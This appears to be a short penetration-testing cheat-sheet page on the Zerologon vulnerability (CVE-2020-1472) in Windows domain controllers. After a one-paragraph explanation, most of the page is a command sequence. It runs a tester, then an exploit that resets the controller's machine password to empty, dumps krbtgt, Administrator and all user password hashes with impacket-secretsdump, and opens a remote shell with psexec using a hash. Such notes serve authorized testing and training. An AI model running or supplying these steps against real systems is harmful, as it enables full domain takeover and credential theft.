zerologon - CVE-2020-1472
Theory
Zerologon is a vulnerability in the cryptography of Microsoft’s Netlogon process that allows an attack against Microsoft Active Directory domain controllers. Zerologon makes it possible for a hacker to impersonate any computer, including the root domain controller.
More: https://www.trendmicro.com/en_in/what-is/zerologon.html
Practical
Test for ZeroLogon Vulenrability
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
pip3 install -r requirements.txt
./zerologon_tester.py EXAMPLE-DC 1.2.3.4
Exploit ZeroLogon Vulenrability
git clone https://github.com/risksense/zerologon.git
pip3 install -r requirements.txt
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
Dump Password Hashes
# Dump krbtgt user hash
sudo impacket-secretsdump -no-pass 'DC-ZEROLOGON$'@212.129.28.18 -just-dc-user krbtgt
# Dump Administrator user hash
sudo impacket-secretsdump -no-pass 'DC-ZEROLOGON$'@212.129.28.18 -just-dc-user Administrator
# Dump All users hashes
sudo impacket-secretsdump -no-pass 'DC-ZEROLOGON$'@212.129.28.18
Remote Shell
./psexec.py /Administrator@212.129.28.18 -hashes aad3b435b51404eeaad3b435b51404ee:777b1935ff37faba2b2c299288b0693b
REFERENCES
Last updated
Was this helpful?